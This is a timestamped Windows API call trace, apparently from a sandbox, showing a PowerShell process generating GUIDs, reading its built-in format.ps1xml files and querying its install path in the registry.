	[0757.925] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x229608dc, Data2=0xf23b, Data3=0x49bc, Data4=([0]=0x96, [1]=0x95, [2]=0xd7, [3]=0xe0, [4]=0xdf, [5]=0x14, [6]=0x6e, [7]=0xd3))) returned 0x0
	[0757.925] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xdfb99da2, Data2=0xe3bf, Data3=0x4633, Data4=([0]=0x89, [1]=0x4, [2]=0xf0, [3]=0x62, [4]=0x23, [5]=0x66, [6]=0x92, [7]=0x66))) returned 0x0
	[0757.925] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x435a4800, Data2=0x6033, Data3=0x4346, Data4=([0]=0xa0, [1]=0x43, [2]=0x57, [3]=0x91, [4]=0xe4, [5]=0xf5, [6]=0x99, [7]=0x11))) returned 0x0
	[0757.926] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x2acb63c6, Data2=0x2881, Data3=0x47cd, Data4=([0]=0x81, [1]=0xb, [2]=0x9f, [3]=0xd4, [4]=0x8d, [5]=0x74, [6]=0x4a, [7]=0x23))) returned 0x0
	[0757.926] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x1f2a2fd7, Data2=0x63fa, Data3=0x4a12, Data4=([0]=0xb5, [1]=0x43, [2]=0xd2, [3]=0xbc, [4]=0xe8, [5]=0x65, [6]=0x4e, [7]=0xb0))) returned 0x0
	[0757.926] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x13b38294, Data2=0x5bb7, Data3=0x48bf, Data4=([0]=0xbb, [1]=0xdf, [2]=0xbf, [3]=0xdf, [4]=0xe4, [5]=0xc6, [6]=0xc7, [7]=0x87))) returned 0x0
	[0757.926] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xf1bc175f, Data2=0xba0c, Data3=0x41c5, Data4=([0]=0x87, [1]=0x33, [2]=0xf5, [3]=0x6e, [4]=0x20, [5]=0x9a, [6]=0x73, [7]=0xdb))) returned 0x0
	[0757.926] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0757.927] GetFileType (hFile=0x310) returned 0x1
	[0757.927] SetErrorMode (uMode=0x1) returned 0x1
	[0757.927] GetFileType (hFile=0x310) returned 0x1
	[0757.927] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0757.927] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0757.927] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0757.928] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0757.928] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0757.928] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0757.928] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0757.928] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0757.928] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.287] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.288] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.288] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.288] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.288] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.288] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.289] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.289] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.290] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.290] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.290] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.291] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.291] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0xe67, lpOverlapped=0x0) returned 1
	[0759.291] ReadFile (in: hFile=0x310, lpBuffer=0x30b1fc7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b1fc7*, lpNumberOfBytesRead=0xed018*=0x0, lpOverlapped=0x0) returned 1
	[0759.291] ReadFile (in: hFile=0x310, lpBuffer=0x30b29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x30b29f8*, lpNumberOfBytesRead=0xed018*=0x0, lpOverlapped=0x0) returned 1
	[0759.292] CloseHandle (hObject=0x310) returned 1
	[0759.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0759.292] SetErrorMode (uMode=0x1) returned 0x1
	[0759.292] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xecfc0 | out: lpFileInformation=0xecfc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0759.292] SetErrorMode (uMode=0x1) returned 0x1
	[0759.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0759.293] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed0a8 | out: phkResult=0xed0a8*=0x310) returned 0x0
	[0759.293] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed02c, lpData=0x0, lpcbData=0xed028*=0x0 | out: lpType=0xed02c*=0x1, lpData=0x0, lpcbData=0xed028*=0x56) returned 0x0
	[0759.293] CoTaskMemAlloc (cb=0x5a) returned 0x39aab0
	[0759.293] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecffc, lpData=0x39aab0, lpcbData=0xecff8*=0x56 | out: lpType=0xecffc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecff8*=0x56) returned 0x0
	[0759.293] CoTaskMemFree (pv=0x39aab0) 
	[0759.293] RegCloseKey (hKey=0x310) returned 0x0
	[0759.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0759.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0759.295] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xa0565d7, Data2=0x3eb4, Data3=0x40dd, Data4=([0]=0x8e, [1]=0x74, [2]=0xdf, [3]=0x3c, [4]=0x5, [5]=0x64, [6]=0xe0, [7]=0xdb))) returned 0x0
	[0759.295] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xd58d3130, Data2=0xc28d, Data3=0x4874, Data4=([0]=0x82, [1]=0x23, [2]=0x45, [3]=0xa3, [4]=0xf2, [5]=0x37, [6]=0x40, [7]=0xb7))) returned 0x0
	[0759.296] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x1b3abdb, Data2=0x80e2, Data3=0x4a1a, Data4=([0]=0xb1, [1]=0x3b, [2]=0x89, [3]=0xbe, [4]=0x43, [5]=0x0, [6]=0xfd, [7]=0x8c))) returned 0x0
	[0759.296] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x2c5c5143, Data2=0xf14b, Data3=0x4938, Data4=([0]=0xba, [1]=0x77, [2]=0xfb, [3]=0x49, [4]=0x2b, [5]=0xb, [6]=0x17, [7]=0x8))) returned 0x0
	[0759.296] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x1f5d6515, Data2=0x61d2, Data3=0x4a08, Data4=([0]=0xbb, [1]=0xd3, [2]=0x41, [3]=0x6, [4]=0x1e, [5]=0xdc, [6]=0x63, [7]=0xd8))) returned 0x0
	[0759.296] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x84093a6e, Data2=0x537, Data3=0x4091, Data4=([0]=0x99, [1]=0x7a, [2]=0x17, [3]=0x9f, [4]=0x81, [5]=0x16, [6]=0x2a, [7]=0x59))) returned 0x0
	[0759.296] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xa362e7d2, Data2=0xad34, Data3=0x41b6, Data4=([0]=0xaf, [1]=0x38, [2]=0x7b, [3]=0xb7, [4]=0xdb, [5]=0x9, [6]=0xcf, [7]=0xaf))) returned 0x0
	[0759.296] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xf1fda0b1, Data2=0x8e09, Data3=0x4901, Data4=([0]=0x9f, [1]=0x19, [2]=0xfb, [3]=0x26, [4]=0x31, [5]=0xa1, [6]=0xd1, [7]=0x61))) returned 0x0
	[0759.297] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x1737fcc0, Data2=0x7057, Data3=0x4127, Data4=([0]=0x9d, [1]=0x6d, [2]=0x9a, [3]=0xac, [4]=0xb8, [5]=0x67, [6]=0xe9, [7]=0x65))) returned 0x0
	[0759.297] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x69f019f7, Data2=0x50d5, Data3=0x47d4, Data4=([0]=0xab, [1]=0xe1, [2]=0x55, [3]=0x69, [4]=0x72, [5]=0x5d, [6]=0x2d, [7]=0x32))) returned 0x0
	[0759.297] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x2c7901af, Data2=0x4520, Data3=0x43c1, Data4=([0]=0x8c, [1]=0x79, [2]=0xb2, [3]=0xa9, [4]=0x8f, [5]=0xfc, [6]=0xfc, [7]=0xa2))) returned 0x0
	[0759.297] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x4b5db6c1, Data2=0xe60f, Data3=0x4e20, Data4=([0]=0x86, [1]=0x3b, [2]=0xc0, [3]=0xf6, [4]=0x8f, [5]=0x2d, [6]=0xd4, [7]=0x1a))) returned 0x0
	[0759.297] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xf67ac54a, Data2=0xbacc, Data3=0x4f0c, Data4=([0]=0xa3, [1]=0x5b, [2]=0x2f, [3]=0x85, [4]=0x2c, [5]=0x7, [6]=0x22, [7]=0x95))) returned 0x0
	[0759.297] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xf7d71e95, Data2=0xb517, Data3=0x4a2c, Data4=([0]=0xa5, [1]=0x35, [2]=0xbd, [3]=0x7d, [4]=0x1f, [5]=0x62, [6]=0x7a, [7]=0xdc))) returned 0x0
	[0759.297] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xb357d3de, Data2=0xddb5, Data3=0x4ae3, Data4=([0]=0xaf, [1]=0x1c, [2]=0xb, [3]=0xd1, [4]=0xb5, [5]=0xda, [6]=0x7a, [7]=0x98))) returned 0x0
	[0759.298] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x3be5bf41, Data2=0x1738, Data3=0x43ea, Data4=([0]=0x9a, [1]=0x6d, [2]=0xa, [3]=0xcb, [4]=0x49, [5]=0xae, [6]=0x46, [7]=0xfd))) returned 0x0
	[0759.298] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x76421fee, Data2=0x9da4, Data3=0x40ed, Data4=([0]=0xb0, [1]=0xc, [2]=0x57, [3]=0x26, [4]=0x65, [5]=0xce, [6]=0xe, [7]=0x2a))) returned 0x0
	[0759.298] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xfe4e5205, Data2=0xe770, Data3=0x4df6, Data4=([0]=0xa8, [1]=0x74, [2]=0x1c, [3]=0xdb, [4]=0xe4, [5]=0x36, [6]=0x78, [7]=0xec))) returned 0x0
	[0759.298] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xe5875282, Data2=0x6a1, Data3=0x4578, Data4=([0]=0xb9, [1]=0xff, [2]=0xf1, [3]=0x9a, [4]=0xe, [5]=0x9b, [6]=0x44, [7]=0x8b))) returned 0x0
	[0759.298] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x6880b7ba, Data2=0xd21b, Data3=0x40de, Data4=([0]=0x8d, [1]=0x9a, [2]=0x6f, [3]=0x9, [4]=0xa7, [5]=0x0, [6]=0xe7, [7]=0x57))) returned 0x0
	[0759.298] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x473de1eb, Data2=0x197e, Data3=0x499d, Data4=([0]=0x80, [1]=0xa2, [2]=0xba, [3]=0xe9, [4]=0xdc, [5]=0xe5, [6]=0x53, [7]=0x7))) returned 0x0
	[0759.299] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xa26d544c, Data2=0x5d6a, Data3=0x4704, Data4=([0]=0xb3, [1]=0xb1, [2]=0x37, [3]=0x9e, [4]=0x25, [5]=0x7c, [6]=0x92, [7]=0x6b))) returned 0x0
	[0759.299] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x74803645, Data2=0x29ca, Data3=0x44a7, Data4=([0]=0xb3, [1]=0xf4, [2]=0x14, [3]=0x9, [4]=0xd9, [5]=0x34, [6]=0x67, [7]=0x48))) returned 0x0
	[0759.299] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x3713090e, Data2=0x22de, Data3=0x4dee, Data4=([0]=0xa8, [1]=0x3c, [2]=0x2, [3]=0x8d, [4]=0x5d, [5]=0x5f, [6]=0x6b, [7]=0x52))) returned 0x0
	[0759.299] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xdf42b10, Data2=0x279e, Data3=0x432e, Data4=([0]=0xb4, [1]=0x83, [2]=0x3b, [3]=0xe2, [4]=0x4a, [5]=0x52, [6]=0xfa, [7]=0x60))) returned 0x0
	[0759.299] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x6b823f7c, Data2=0x1f6f, Data3=0x4048, Data4=([0]=0x91, [1]=0x6c, [2]=0xc6, [3]=0x9c, [4]=0x15, [5]=0xf, [6]=0xca, [7]=0x3a))) returned 0x0
	[0759.299] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x7c77b386, Data2=0x7714, Data3=0x47db, Data4=([0]=0xb3, [1]=0x4, [2]=0xdc, [3]=0x24, [4]=0x56, [5]=0x93, [6]=0x72, [7]=0x90))) returned 0x0
	[0759.299] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xc1659a5c, Data2=0x2caa, Data3=0x4d99, Data4=([0]=0xae, [1]=0x84, [2]=0xa9, [3]=0x33, [4]=0x10, [5]=0xef, [6]=0xa6, [7]=0xc7))) returned 0x0
	[0759.300] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x693ab1c7, Data2=0x22ce, Data3=0x47df, Data4=([0]=0xb9, [1]=0x40, [2]=0xa3, [3]=0xf9, [4]=0xf5, [5]=0xfa, [6]=0xa9, [7]=0x63))) returned 0x0
	[0759.300] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x40a2e3bf, Data2=0x92af, Data3=0x4793, Data4=([0]=0xb6, [1]=0x5e, [2]=0x64, [3]=0x7d, [4]=0x88, [5]=0xca, [6]=0xd0, [7]=0xd7))) returned 0x0
	[0759.300] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xc6a06ae4, Data2=0xb0a2, Data3=0x44f8, Data4=([0]=0xa6, [1]=0x19, [2]=0xbd, [3]=0x1c, [4]=0xad, [5]=0xf7, [6]=0x6d, [7]=0x5))) returned 0x0
	[0759.300] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xc05f917d, Data2=0xe3aa, Data3=0x4bbc, Data4=([0]=0xa0, [1]=0xe8, [2]=0x7c, [3]=0x8e, [4]=0xcc, [5]=0xa3, [6]=0xed, [7]=0x48))) returned 0x0
	[0759.300] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xf2da2c07, Data2=0xa966, Data3=0x4283, Data4=([0]=0x8f, [1]=0x7f, [2]=0xa2, [3]=0x68, [4]=0xcf, [5]=0x17, [6]=0x37, [7]=0x39))) returned 0x0
	[0759.302] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x4dea3133, Data2=0x7f59, Data3=0x450f, Data4=([0]=0x80, [1]=0x4d, [2]=0xdd, [3]=0xb0, [4]=0x78, [5]=0x94, [6]=0x82, [7]=0xe5))) returned 0x0
	[0759.302] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xd3324262, Data2=0x32b9, Data3=0x4335, Data4=([0]=0xb1, [1]=0x95, [2]=0x35, [3]=0xfa, [4]=0x56, [5]=0x5d, [6]=0x89, [7]=0xf2))) returned 0x0
	[0759.302] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xc81625bc, Data2=0xb7a0, Data3=0x4b68, Data4=([0]=0xb0, [1]=0x8, [2]=0x30, [3]=0xb8, [4]=0xb1, [5]=0x3a, [6]=0xa0, [7]=0x7d))) returned 0x0
	[0759.302] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xe9499dd9, Data2=0xd0f8, Data3=0x4344, Data4=([0]=0x8a, [1]=0x4c, [2]=0xc0, [3]=0x40, [4]=0x38, [5]=0x6c, [6]=0x38, [7]=0x8b))) returned 0x0
	[0759.302] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xf1bd91fe, Data2=0x31de, Data3=0x4e7c, Data4=([0]=0xa9, [1]=0xf4, [2]=0x69, [3]=0xad, [4]=0xc, [5]=0x79, [6]=0x41, [7]=0x57))) returned 0x0
	[0759.303] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xf1337b21, Data2=0x2e58, Data3=0x4610, Data4=([0]=0xb7, [1]=0x8a, [2]=0x57, [3]=0xbf, [4]=0x58, [5]=0x3f, [6]=0x1f, [7]=0x3e))) returned 0x0
	[0759.303] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xbe79488b, Data2=0x10f6, Data3=0x494e, Data4=([0]=0xbb, [1]=0x1, [2]=0x91, [3]=0xf, [4]=0x28, [5]=0xe, [6]=0x66, [7]=0x87))) returned 0x0
	[0759.303] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x5e1677eb, Data2=0x85ff, Data3=0x4bea, Data4=([0]=0xa3, [1]=0x90, [2]=0xeb, [3]=0x78, [4]=0x55, [5]=0x9a, [6]=0xdd, [7]=0xf4))) returned 0x0
	[0759.303] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xecbad0d8, Data2=0xab5f, Data3=0x4989, Data4=([0]=0x94, [1]=0xc4, [2]=0xe3, [3]=0x66, [4]=0x4a, [5]=0x24, [6]=0x8d, [7]=0xf9))) returned 0x0
	[0759.303] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x1c07c76d, Data2=0xb529, Data3=0x4d78, Data4=([0]=0xbe, [1]=0x1e, [2]=0x6b, [3]=0x9c, [4]=0x8c, [5]=0xb, [6]=0x56, [7]=0x6c))) returned 0x0
	[0759.303] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xcf16531f, Data2=0x19f3, Data3=0x4cb4, Data4=([0]=0xb6, [1]=0x21, [2]=0x50, [3]=0xf0, [4]=0x1f, [5]=0x88, [6]=0x41, [7]=0x23))) returned 0x0
	[0759.304] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x89bf039a, Data2=0x86a1, Data3=0x4f2d, Data4=([0]=0xbd, [1]=0x45, [2]=0xcb, [3]=0xfe, [4]=0xa4, [5]=0x69, [6]=0xbd, [7]=0x1f))) returned 0x0
	[0759.304] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x9b24503, Data2=0x6e7b, Data3=0x492a, Data4=([0]=0x8e, [1]=0xb2, [2]=0x70, [3]=0xfb, [4]=0x39, [5]=0x5, [6]=0x22, [7]=0x51))) returned 0x0
	[0759.304] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x83e3010b, Data2=0xf72b, Data3=0x4d88, Data4=([0]=0xb8, [1]=0xc9, [2]=0xd3, [3]=0x84, [4]=0xc5, [5]=0xaf, [6]=0x5, [7]=0x90))) returned 0x0
	[0759.304] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xc2e91e56, Data2=0xfb0f, Data3=0x46b2, Data4=([0]=0xad, [1]=0xdd, [2]=0x25, [3]=0x90, [4]=0xe5, [5]=0xd, [6]=0xcd, [7]=0xf8))) returned 0x0
	[0759.304] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0759.304] GetFileType (hFile=0x310) returned 0x1
	[0759.305] SetErrorMode (uMode=0x1) returned 0x1
	[0759.305] GetFileType (hFile=0x310) returned 0x1
	[0759.305] ReadFile (in: hFile=0x310, lpBuffer=0x3210990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x3210990*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.306] ReadFile (in: hFile=0x310, lpBuffer=0x3210990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x3210990*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.306] ReadFile (in: hFile=0x310, lpBuffer=0x3210990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x3210990*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.306] ReadFile (in: hFile=0x310, lpBuffer=0x3210990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x3210990*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
